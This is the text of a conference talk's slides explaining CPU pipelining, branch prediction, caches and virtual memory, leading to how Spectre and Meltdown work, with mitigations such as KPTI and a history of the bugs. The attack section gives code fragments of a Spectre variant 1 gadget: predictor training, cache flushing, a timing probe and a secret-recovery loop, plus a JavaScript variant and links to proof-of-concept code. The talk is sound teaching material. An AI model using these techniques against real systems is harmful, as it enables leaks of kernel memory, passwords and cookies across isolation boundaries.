CPU GHOST BUSTING. Semihalf Barcamp Special.

Semihalf
Uncovering the mechanisms behind Meltdown and Spectre.
* Image source: https://www.gq.com/story/the-best-part-of-the-snowman-is-all-of-these-terrible-advertisements

Agenda
● The CPU inside out
○ Pipelining
○ Out-of-order execution
○ Speculation
○ Virtual memory
● Spectre & Meltdown
● Attack vectors
● History

Central Processing Unit (CPU) — electronic
circuitry that performs basic arithmetic,
logical, control and input/output operations
specified by the instructions.
— Wikipedia
Basic - meaning simple?

What does a CPU look like?
Source: Kaby Lake, https://newsroom.intel.com/press-kits/8th-gen-intel-core/
2 billion transistors
Why so many?

Dead simple: the CPU*
Blocks: Memory, PC, Instruction Fetch/Decode, Registers, ALU
Stages: Instruction Fetch -> Decode/Load -> Execute -> Write
* This is only a conceptual diagram

Measures of CPU speed
● 1 CPU cycle = 1 clock tick
● CPI - cycles per instruction
● IPC - instructions per cycle = 1/CPI
● MIPS - millions of instructions per second
● speed != performance
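The relationship between these measures can be written down in a few lines. This is a minimal sketch; the function names `mips` and `ipc_from_cpi` are made up for illustration. For example, a 4 MHz clock at 4 CPI gives 1 MIPS.

```c
#include <assert.h>

/* Throughput in MIPS for a clock given in MHz and an average CPI.
 * MHz already means "millions of cycles per second", so dividing by
 * cycles-per-instruction yields millions of instructions per second. */
double mips(double clock_mhz, double cpi)
{
    assert(clock_mhz > 0.0 && cpi > 0.0);
    return clock_mhz / cpi;
}

/* IPC is simply the reciprocal of CPI. */
double ipc_from_cpi(double cpi)
{
    assert(cpi > 0.0);
    return 1.0 / cpi;
}
```

Calling `mips(40.0, 4.0)` models a fast clock that is held back by a high CPI, which is why speed != performance.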

Simple CPU - 4 MHz
mov len(,1), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
Cycle     1 2 3 4 5 6 7 8 9
mov ...   F D E W
xor ...           F D E W
cmp ...                   F
(F = Fetch, D = Decode, E = Execute, W = Write)
4 MHz / 4 CPI = 1 MIPS
We want it faster! 1 CPI? How to do it?

Simple pipelined CPU
Blocks: Memory, PC, Registers, ALU
Pipeline stages: Instruction Fetch/Decode -> Instruction Decode/Execute -> Instruction Execute/Write
Is it faster?
* Intel i486

Simple pipelined CPU
Cycle     1 2 3 4 5 6 7 8 9
mov ...   F D E W
xor ...     F D E W
cmp ...       F D E W
div ...         F D E W
CPU state in a single cycle (cycle 4): Write, Execute, Decode, Fetch
How many MIPS?

Simple pipelined CPU - 4 MHz
mov len(,1), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
Cycle: 1 2 3 4 5 6 7 8 9
Stages: Fetch, Decode, Execute, Write
4 MHz / 1 CPI = 4 MIPS
Even faster! Raise the clock?
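The gain from pipelining can be checked with a small cycle count. The sketch below assumes an ideal pipeline with no stalls; the function names are hypothetical. For many instructions the pipelined CPI approaches 1, which is where the 4 MIPS figure comes from.

```c
#include <assert.h>

/* Cycles needed without pipelining: every instruction occupies the
 * whole datapath for all of its stages before the next one starts. */
unsigned long cycles_sequential(unsigned long n_instr, unsigned stages)
{
    assert(stages > 0);
    return n_instr * stages;
}

/* Cycles needed by an ideal pipeline: the first instruction takes
 * `stages` cycles, every following one completes one cycle later. */
unsigned long cycles_pipelined(unsigned long n_instr, unsigned stages)
{
    assert(stages > 0);
    return n_instr == 0 ? 0 : stages + (n_instr - 1);
}
```

With 4 stages, three instructions need 12 cycles sequentially but only 6 when pipelined.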

Simple pipelined CPU - 8 MHz
mov len(,1), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
Cycle: 1 2 3 ... 17
Each instruction: F D E W
8 MHz / 1 CPI = 8 MIPS
Even faster!

40 MHz?
mov len(,1), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
40 MHz / 1 CPI = 40 MIPS?
Is that possible?

The clock is not everything
mov len(,1), %rdx
xor %eax, %eax
cmp %rdi, %rdx
...
40 MHz / 1 CPI = 40 MIPS?
Why not?
Source: https://en.wikipedia.org/wiki/Megahertz_myth

DRAM evolution
Source: https://en.wikipedia.org/wiki/CAS_latency (First Word)
DRAM access time has stayed about the same since the 1990s
Even faster! ...but DRAM is slow...
What to do?

Pipelined CPU with cache
Blocks: Memory, Instr. Cache, Data Cache, Write Buffer, PC, Registers, ALU
What has changed? Is it faster?
* Intel i486

Pipelined CPU with cache
Cycle diagram: mov, xor ..., cmp ..., div ...; labels: cache miss, stall
Pipeline stall :(
40 MHz / ~4 CPI = ~10 MIPS
Even faster! ...but the pipeline stalls...
What to do?

Superscalar processor with cache
Blocks: Memory, Instr. Cache, Data Cache, Write Buffer, PC, Registers, ALU, ALU
What has changed? Is it faster?
* Intel Pentium

Superscalar processor with cache
Cycle diagram: mov ..., xor ..., cmp ..., div ...; labels: cache miss, stall, write ordering, read ordering
Ordering :(
40M CPS / ~4 CPI * 1.5 IPC = ~15 MIPS
Really?
Even faster! ...but instructions must stay in order...

Out of Order
* Intel Pentium Pro and newer
Cycle diagram: mov ..., xor ..., cmp ..., div ...; label: cache miss
Re-order buffer: raises the average IPC
Reads out of order :(
Writes out of order :(
What about branches?

Conditional branches
uint8_t array[256];
size_t array_size = 256;
uint8_t bounds_check(size_t idx)
{
    if (idx < array_size)
        return array[idx];
    return 0;
}
bounds_check:
    xor %eax, %eax
    cmp %rdi, array_size(%rip)
    jbe .L1
    mov array(%rdi), %eax
.L1:
    ret
Can branches execute out of order?

Conditional branches in an OoO CPU
xor %eax, %eax
jbe .L1
.L1:
ret
Cycle diagram: cmp ... (cache miss), xor ..., jbe ... (dependency, stall), then mov or ret? (stall?)
...but we do not know the condition yet...
Even faster! What to do?

CPU with speculation
xor %eax, %eax
jbe .L1
.L1:
ret
Cycle diagram: cmp ... (cache miss), xor ..., jbe ... (dependency, stall), mov* (cache miss, speculation), ret* (speculation)
What if the result turns out to be different?

Branch Miss
Cycle diagram: cmp ... (cache miss), xor ..., jbe ... (dependency, stall), mov* (cache miss, speculation), ret* (speculation), ret (icache miss)
Pipeline flush!
branch miss penalty
Even faster! ...but a branch miss is expensive...
What to do?

What to do at a branch?
xor %eax, %eax
jbe .L1
ret
...
ret
...
1. Left
2. Right
3. Both directions?!
4. Ideas?

Branch Predictor
cmp ...
xor ...
jbe ... (prediction)
mov ...
ret ...
...
Branch History Table: indexed by the last n bits of the instruction address, 2^n elements
Branch history: each element keeps the recent Y/N outcomes of a branch, e.g. Y Y Y Y, N N N N, Y N Y
Source: https://en.wikipedia.org/wiki/Branch_predictor
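A table like this can be sketched in C. The example below is an illustration only, not a description of any real CPU: it assumes n = 4 and uses a 2-bit saturating counter per entry instead of a full Y/N history, a classic textbook scheme. All names (`bht_t`, `bht_predict`, `bht_update`) are made up for this sketch.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BHT_BITS 4                     /* n: assumed index width */
#define BHT_SIZE (1u << BHT_BITS)      /* 2^n table entries      */

/* One 2-bit saturating counter per entry:
 * 0, 1 = predict not taken; 2, 3 = predict taken. */
typedef struct { uint8_t counter[BHT_SIZE]; } bht_t;

/* Start every entry at "weakly not taken". */
void bht_init(bht_t *t)
{
    assert(t != NULL);
    memset(t->counter, 1, sizeof t->counter);
}

/* Index with the last n bits of the branch instruction address. */
static unsigned bht_index(uintptr_t branch_addr)
{
    return (unsigned)(branch_addr & (BHT_SIZE - 1));
}

bool bht_predict(const bht_t *t, uintptr_t branch_addr)
{
    return t->counter[bht_index(branch_addr)] >= 2;
}

/* Move the counter towards the real outcome, saturating at 0 and 3. */
void bht_update(bht_t *t, uintptr_t branch_addr, bool taken)
{
    uint8_t *c = &t->counter[bht_index(branch_addr)];
    if (taken && *c < 3)
        (*c)++;
    else if (!taken && *c > 0)
        (*c)--;
}
```

Because only the low bits of the address are used, two different branches can share one entry, so the history of one branch influences the prediction for the other.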

CPU with branch prediction
xor %eax, %eax
jbe .L1
.L1:
ret
Cycle diagram: cmp ... (cache miss), xor ..., jbe ... (dependency), mov* (speculation, cache miss), ret* (speculation)
Prediction: do not take branch
Even faster! Many cores!

Speculation window
if (x < array_size)
    return (array[x]*777)^7;
return 0;
Legend: F = Fetch, D = Decode, EX = Execute, W = Write, R = Retire, - = pipeline bubble (stall); diagram label: Cache miss
Cycle 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
movq array_size, %rdx F D EX EX EX - - - - - - - - W R
xor %eax, %eax F D EX W - - - - - - - - - - R
cmpq %rdi, %rdx F D - - - - - - - - - - EX W R
jbe exit F D - - - - - - - - - - - EX W R
movzq array(%rdi), %rax F D EX EX EX W - - - - - - - - R
imulq $777, %rax, %rax F D - - - EX EX EX W - - - - - - R
xorq $7, %rax F D - - - - - EX W - - - - - R
ret #exit F D EX W - - - - - - - - - - - R

CPU core block diagram
Source: Skylake Microarchitecture, Intel 64 and IA-32 Architectures Optimization Reference Manual
Front end: 32K L1 Instruct. Cache, Branch Prediction Unit, Legacy Decode Pipeline, MSROM, Decoded Icache
Instruction Decode Queue (micro-op queue)
Allocate/Rename/Retire/Move Elimination/Zero Idiom
Scheduler
Port 0: ALU, Vec ALU, Vec Shft, Vec Add, Vec Mul, FMA, DIV, Branch2
Port 1: ALU, Fast LEA, Vec ALU, Vec Shft, Vec Add, Vec Mul, FMA, Slow Int, Slow LEA
Port 5: ALU, Fast LEA, Vec ALU, Vec Shuff
Port 6: ALU, SHFT, Branch1
P. 2: LD/STA
P. 3: LD/STA
P. 4: STD
P. 7: STA
Memory: 32K L1 Data Cache, 256K L2 Cache

Photo of a real CPU
Die photo labels: six CPU Core blocks (ALUs and a BPU marked in each), L3 Cache, System Agent, Memory Controller, Interconnect, GPU
2 billion transistors
Source: https://newsroom.intel.com/press-kits/8th-gen-intel-core/

Virtual memory
64 bit virtual address space
Process 1: array, main()
Process 2: main()
Kernel: syscall()
Physical Memory: data
Swap
The OS builds the memory map
The CPU (TLB) translates Virt => Phys
How to communicate?
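The Virt => Phys step can be illustrated with a toy model. This is a sketch under loud assumptions: 4 KiB pages, a single-level table with 16 entries, and made-up names (`toy_page_table`, `toy_translate`). Real x86-64 page tables are multi-level and the TLB only caches their results.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PAGE_SHIFT 12u                     /* assumed 4 KiB pages    */
#define PAGE_SIZE  (1ull << PAGE_SHIFT)
#define TOY_PAGES  16u                     /* toy address space size */
#define NOT_MAPPED UINT64_MAX

/* Toy single-level page table: index = virtual page number,
 * value = physical frame number (or NOT_MAPPED). */
typedef struct { uint64_t frame[TOY_PAGES]; } toy_page_table;

/* Split the virtual address into page number and offset, look the
 * page up and glue the physical frame number back onto the offset. */
uint64_t toy_translate(const toy_page_table *pt, uint64_t vaddr)
{
    assert(pt != NULL);
    uint64_t vpn = vaddr >> PAGE_SHIFT;
    uint64_t offset = vaddr & (PAGE_SIZE - 1);
    if (vpn >= TOY_PAGES || pt->frame[vpn] == NOT_MAPPED)
        return NOT_MAPPED;   /* a real CPU would raise a page fault here */
    return (pt->frame[vpn] << PAGE_SHIFT) | offset;
}
```

Each process gets its own table, which is how the OS keeps the address spaces of Process 1 and Process 2 apart.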

Virtual memory in Linux
Start Kernel Map
Process 1: array1, main() | Kernel: syscall(), data
Process 2: main() | Kernel: syscall()
Physical Memory: data
Swap
SYSCALL, data access
How to protect the data?

Privilege Level Switch
64 bit virtual address space
Start Kernel Map
Process: array1, main() | Kernel: syscall(), data
privilege context switch (SYSCALL)
the kernel is able to access process data
the process is not able to access kernel data
What does Meltdown do?

This section focuses on describing the Spectre and Meltdown attacks.
We will show how the topics presented so far fit together.
Expecting more detail? - discussion after the presentation.

● Variant 1: bounds check bypass (CVE-2017-5753)
Any CPU with speculative execution
● Variant 2: branch target injection (CVE-2017-5715)
● Variant 3: rogue data cache load (CVE-2017-5754)
Confirmed on Intel and ARM A75
IBM POWER 7+ & 8

uint8_t array1[16];
void victim_function(size_t x) {
if (x < array1_size) {
tmp ^= array1[x];
}
}
1) A textbook pattern, and the code contains no logic bug
2) The CPU tries to keep the pipeline 100% busy -> speculation
3) Can the speculative code execute before the condition is resolved?
4) Is there a data dependency?

uint8_t array1[16];
void victim_function(size_t x) {
    if (x < array1_size) {
        tmp ^= array1[x];
    }
}
cmpq %rdi, array1_size(%rip)
jbe .L1
movb array1(%rdi), %al
xorb %al, tmp(%rip)
.L1: ret
1) The lack of a data dependency allows the instructions to execute “in parallel”
2) “retire” - the order in which the deferred effects of executed instructions become visible
3) MOST IMPORTANT - how does the CPU KNOW whether the branch is worth taking?

Diagram labels: decode, retire, branch history N N N N N T/N?, pipeline flush
1) The CPU guesses - it exploits “branch locality”
2) A wrong prediction = pipeline flush (e.g. x >= array1_size)
3) The effect of the out-of-bounds access is NOT made visible - rollback
4) “Speculation window” - the time available for speculative execution
5) How do we “train” the branch predictor so that it speculatively accesses out of bounds?
uint8_t array1[16];
void victim_function(size_t x) {
    if (x < array1_size) {
        tmp ^= array1[x];
    }
}
cmpq %rdi, array1_size(%rip)
jbe .L1
movb array1(%rdi), %al
xorb %al, tmp(%rip)
.L1: ret

uint8_t array1[16];
uint8_t array2[256 * 512];
void victim_function(size_t x) {
    if (x < array1_size) {
        tmp ^= array2[array1[x] * 512];
    }
}
1) Code fragment from the attack - two arrays, the second indexed indirectly through the first
2) Training the branch predictor raises the chance of a speculative out-of-bounds access
3) What do we gain, given that the effects of speculative execution are discarded?
4) What are the memory side effects of the code above?
train!

uint8_t array1[16];
uint8_t array2[256 * 512];
void victim_function(size_t x) {
    if (x < array1_size) {
        tmp ^= array2[array1[x] * 512];
    }
}
invalidate_cache(array2); // make array2 “cold”
victim_function(train_x = 5); // train - call many times
Virtual Memory: array1_size, array1, array2
Legend: “cold” memory, cached memory

uint8_t array1[16];
uint8_t array2[256 * 512];
void victim_function(size_t x) {
    if (x < array1_size) {
        tmp ^= array2[array1[x] * 512];
    }
}
invalidate_cache(array2);
victim_function(train_x = valid_x);
invalidate_cache(&array1_size); // “opens” the speculation window
victim_function(secret - array1);
The accesses to secret and array2 must complete before the condition retires
Virtual Memory: array1_size, array1, secret, array2
secret = 60
precached

Virtual Memory: array1_size, array1, secret, array2
Memory hierarchy: L1, L2, LLC, RAM
uint8_t array2[256 * 512];
void measure() {
    for (i = 0; i < 256; i++) {
        before = rdtscp();          // timestamp before the probe
        tmp = array2[i * 512];      // fast only if this line is cached
        after = rdtscp();           // timestamp after the probe
        time[i] = after - before;
    }
}
*secret == train_x
quiz >> cache_line_size?

Virtual Memory: array1_size, array1, secret, array2
Memory hierarchy: L1, L2, LLC, RAM
for (i = 0; i < 1000; i++) {
    train_x = i % array1_size;
    malicious_x = secret - array1;
    victim_function(train_x);
    invalidate_cache(&array1_size);
    victim_function(malicious_x);
    measure();
    if (score_filtration(&secret_val))
        break;
}
return secret_val;
various methods
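The slide does not show how the measured times are turned into a guess. One simple possibility is sketched below: pick the index with the shortest access time, ignoring the value that the training calls cached legitimately. The function `fastest_probe` and its parameters are hypothetical and are not the `score_filtration` from the slide. A practical attack would typically repeat the measurement and vote to filter out noise.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns the index (0..255) whose probe was the fastest, i.e. the
 * most likely cached array2 slot. `skip` is a byte value to ignore
 * (for example the one touched during training); pass -1 to consider
 * every index. */
int fastest_probe(const uint64_t probe_time[256], int skip)
{
    assert(probe_time != NULL);
    int best = -1;
    for (int i = 0; i < 256; i++) {
        if (i == skip)
            continue;
        if (best < 0 || probe_time[i] < probe_time[best])
            best = i;
    }
    return best;
}
```

With the secret = 60 example used earlier, slot 60 would be the one that stands out with a short access time.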

The information presented so far is essential
for understanding the whole topic.
Unclear?
Questions?

if (index < simpleByteArray.length) {
index = simpleByteArray[index | 0];
index = (((index * TABLE1_STRIDE)|0) & (TABLE1_BYTES-1))|0;
localJunk ^= probeTable[index|0]|0;
}
cmpl r15,[rbp-0xe0]
jnc 0x24dd099bb870
REX.W leaq rsi,[r12+rdx*1]
movzxbl rsi,[rsi+r15*1]
shll rsi, 12
andl rsi,0x1ffffff
movzxbl rsi,[rsi+r8*1]
xorl rsi,rdi
REX.W movq rdi,rsi
JIT
● degrade high-resolution timer
● disable HTML5 Web Workers
● strict site isolation
● branch speculation barrier
● index modulo
● Spectre check
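The “index modulo” idea from the list above can be sketched in C. The assumption here is a power-of-two table size, so that the modulo becomes a bit mask. The names `lookup_table` and `masked_read` are made up for illustration. An optimizing compiler may remove a mask it can prove redundant, so production code uses dedicated helpers (the Linux kernel has `array_index_nospec()`) instead of plain C like this.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TABLE_SIZE 256u   /* must be a power of two for the mask to work */

static uint8_t lookup_table[TABLE_SIZE];

/* Bounds-checked read that additionally masks the index. Even if the
 * branch is mispredicted and the load runs speculatively with an
 * out-of-range idx, the masked index still points inside the table. */
uint8_t masked_read(size_t idx)
{
    assert((TABLE_SIZE & (TABLE_SIZE - 1u)) == 0u);
    if (idx < TABLE_SIZE)
        return lookup_table[idx & (TABLE_SIZE - 1u)];
    return 0;
}
```

Architecturally the function behaves exactly like the plain bounds check; the mask only changes what a mispredicted, speculative load is able to touch.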

Attack scenarios on the same machine (diagram labels)
● Process to process: Proc 1 (Attacker), IPC, Proc 2 (Victim, Secret)
● User process and kernel via eBPF: eBPF bytecode, verifier, BPF JIT, kprobes, tracepoints, buffer, sensitive data
● Virtual machines: Victim VM space, params x, sensitive data
● Web browser process with sandbox JS VM isolation: Page 1 (JS JIT, Attacker), Page 2 (Victim, Secret Cookie, Secret Password)
● User process and kernel: program, Cache, sensitive data, ignore access bits, KPTI
Virtual Memory: array_size, array1, secret, array2

● Variant 1 (Spectre): a side-channel attack carried out within
code running in the victim's address space
● Variant 3 (Meltdown): specific to the CPU µarch.
A side-channel attack on cached data that bypasses
the validation of virtual memory access rights.

Virtual memory (markers at 0 bit, 47bit, 48bit): User Space 128 TB, Kernel Space 128 TB
Physical memory: PCI-e range, SOC range, RAM
RAM pages: Process 1 page, Process n page, Shared page, Kernel page, DMA page
Kernel logical address: kmalloc()
Kernel virtual address: vmalloc()
int fd = open("/proc/version", O_RDONLY);
pread(fd, buf, sizeof(buf), 0);
Mapping required for: Trap, IRQ, Syscall
Kernel privileges
cached
tmp ^= array2[array1[x] * 512]
User privileges
KPTI: non-trivial - shadow address spaces, threads, x86 vector tables

But the KPTI patches reduce performance! Why?
And will I still be able to play my game?!

Non KPTI kernel: Proc 1 memory + Kernel memory, Context switch, Proc 2 memory + Kernel memory, IRQ
KPTI kernel: Proc 1 memory, Kernel memory, Context switch, IRQ
Events: Context switch, Privilege level switch, Translation lookaside buffer flush
Frequency labels: often, occasionally

● Spectre + Meltdown in 99 lines by Andriy Berestovskyy
https://github.com/Semihalf/spectre-meltdown.git
● The original PoC from the “Spectre paper”, with comments
that make the details easier to follow
https://gist.github.com/semihalf-biernacki-radoslaw/3d5518e19bebb6cb145ae84e48aa8f2b
Based on "Spectre Attack" by Paul Kocher et al

https://asciinema.org/a/yg9hEO7gohO6EJa6PVz2My3yk

1995: Audit of 80x86 processors
“The Intel 80x86 Processor Architecture: Pitfalls for Secure Systems”
The report identifies mechanisms that can lead to information leaks.
2005: Cache missing for fun and profit
“Cache missing for fun and profit”
The author shows the threats posed by memory shared between threads.
August 2014: Flush + Reload: L3 Cache Side Channel
“FLUSH + RELOAD: a High Resolution, Low Noise, L3 Cache Side-Channel Attack”
The author, Yuval Yarom, is a co-discoverer of the Spectre bug.
1 February 2017: CVE assigns bug numbers to Intel
Intel receives the numbers:
2017-5715 - variant 2
2017-5753 - variant 1
2017-5754 - variant 3
3 January 2018: Publication of the Meltdown and Spectre bugs
“Reading privileged memory with a side-channel”
Google brings the publication forward because reports about the bugs are surfacing everywhere.

Thank you for your attention.
For lack of time we skipped some aspects:
Variant 2, CPU uCode fix, BTB flush / speculation barrier, retpoline, ASID/PCID, KASLR, Tomasulo's algorithm ...
Want to know more? - let's talk over
